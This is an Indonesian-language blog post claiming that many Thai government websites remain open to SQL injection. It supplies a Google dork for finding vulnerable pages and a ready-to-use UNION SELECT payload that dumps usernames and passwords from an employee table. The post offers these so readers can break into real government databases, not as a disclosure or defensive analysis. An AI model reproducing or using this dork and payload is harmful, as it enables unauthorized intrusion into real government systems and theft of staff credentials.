Celah SQLI Pada Website Pemerintahan Thailand | Pro 119 Links

Minggu, 07 April 2019

Celah SQLI Pada Website Pemerintahan Thailand

Celah SQLI Pada Website Pemerintahan Thailand

Situs – situs pemerintahan thailand, banyak sekali yang mempunyai kerentanan dan ringan diinjeksi. Hanya cukup bersama lakukan sql injection, kalian dapat menyusupi database berasal dari situs target.

Vuln ini sebetulnya telah lama ditemukan dan saya pun dulu memicu write upnya di laman facebook, namun entah kenapa tidak tersedia perbaikan berasal dari pihak admin situs pemerintah thailand. Dan bukan cuma satu dua, namun hampir seluruh situs tetap dapat disusupi manfaatkan sql injection.

Tanpa wajib tools seperti havij dan sqlmap, ataupun injeksi secara manual. Disini saya dapat berikan dork beserta exploit yang dapat segera mengkuak database websitenya.

Dork: inurl:plantype_id= main.php
Exploit: -69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-

Baca selengkapnya di Thailand Government SQL Injection Vulnerability.

Load comments

Get notify via email